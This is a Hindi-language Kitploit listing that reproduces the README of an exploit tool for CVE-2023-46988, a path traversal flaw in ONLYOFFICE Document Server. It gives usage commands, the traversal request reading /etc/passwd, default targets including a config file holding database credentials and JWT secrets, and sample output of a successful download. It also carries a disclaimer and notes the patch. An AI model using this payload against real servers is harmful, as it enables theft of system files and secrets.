Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OnlyOffice-path-traversal — CVE-2023-46988: ONLYOFFICE पाथ ट्रैवर्सल एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/mihat2/onlyoffice-path-traversal
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmihat2/onlyoffice-path-traversal

OnlyOffice-path-traversal

CVE-2023-46988: ONLYOFFICE पाथ ट्रैवर्सल एक्सप्लॉइट

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ONLYOFFICE पथ ट्रैवर्सल शोषण (CVE-2023-46988)

📌 अवलोकन

यह स्क्रिप्ट ONLYOFFICE Document Server (CVE-2023-46988) में एक पथ ट्रैवर्सल भेद्यता का शोषण करती है जो अनधिकृत उपयोगकर्ताओं को सर्वर से मनमानी फ़ाइलों की प्रतिलिपि बनाने की अनुमति देती है। यह भेद्यता /example/editor एंडपॉइंट में मौजूद है, जहाँ fileExt पैरामीटर में हेरफेर करके संवेदनशील सिस्टम और कॉन्फ़िगरेशन फ़ाइलों तक पहुँचा जा सकता है।

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है।
स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध और अनैतिक है।

🛠 विशेषताएँ

  • डिफ़ॉल्ट संवेदनशील फ़ाइलें प्राप्त करें:
    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json (इसमें शामिल हैं)
डेटाबेस क्रेडेंशियल और JWT रहस्य
  • --file तर्क के साथ प्राप्त करने के लिए कोई भी फ़ाइल पथ निर्दिष्ट करें।
  • Burp Suite इंटरसेप्शन के लिए वैकल्पिक प्रॉक्सी का समर्थन करता है (--proxy)।
  • वैकल्पिक SSL सत्यापन का समर्थन करता है (--verify)।
  • विशेष वर्णों वाली फ़ाइलें डाउनलोड करते समय एन्कोडिंग समस्याओं को ठीक करता है।
  • 🚀 उपयोग

    1️⃣ मूल उपयोग (डिफ़ॉल्ट फ़ाइलें प्राप्त करें)

    root@kitploit:~
    python onlyoffice_exploit.py http://localhost
    

    यह प्राप्त करता है:

    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json

    2️⃣ एक कस्टम फ़ाइल प्राप्त करें (जैसे, /etc/hosts)

    root@kitploit:~
    python onlyoffice_exploit.py http://localhost --file /etc/hosts
    

    3️⃣ प्रॉक्सी सक्षम करें (जैसे, 127.0.0.1:8080 पर Burp Suite)

    root@kitploit:~
    python onlyoffice_exploit.py http://localhost --proxy
    
    root@kitploit:~
    python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
    

    4️⃣ SSL सत्यापन सक्षम करें

    root@kitploit:~
    python onlyoffice_exploit.py https://example.local --verify
    

    5️⃣ प्रॉक्सी और SSL सत्यापन को संयोजित करें

    root@kitploit:~
    python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
    

    🔍 यह कैसे काम करता है

    1. एक दुर्भावनापूर्ण fileExt पैरामीटर के साथ /example/editor पर एक अनुरोध भेजता है:
      root@kitploit:~
      GET /example/editor?fileExt=../../../../../../../../etc/passwd
      
    2. प्रतिक्रिया से रीडायरेक्ट URL निकालता है।
    3. प्रतिक्रिया से रीडायरेक्ट की गई फ़ाइल नाम को पार्स करता है।
    4. फ़ाइल नामों में विशेष वर्णों के लिए एन्कोडिंग समस्याओं को ठीक करता है।
    5. /example/download?fileName=<extracted_filename> से फ़ाइल डाउनलोड करता है।

    🛠 उदाहरण आउटपुट

    root@kitploit:~
    [*] Target URL: http://localhost
    [*] Attempting to retrieve: /etc/passwd
    [*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
    [+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
    [+] Extracted File Name: .passwd
    [*] Downloading file: http://localhost/example/download?fileName=.passwd
    [+] File downloaded successfully: .passwd
    

    🔒 शमन

    ONLYOFFICE ने अपने फरवरी 2024 अपडेट में इस भेद्यता को ठीक कर दिया है।
    उपयोगकर्ताओं को अपने सर्वरों की सुरक्षा के लिए नवीनतम संस्करण में अपडेट करना चाहिए।

    🐜 लाइसेंस

    यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।

    टूल डाउनलोड करें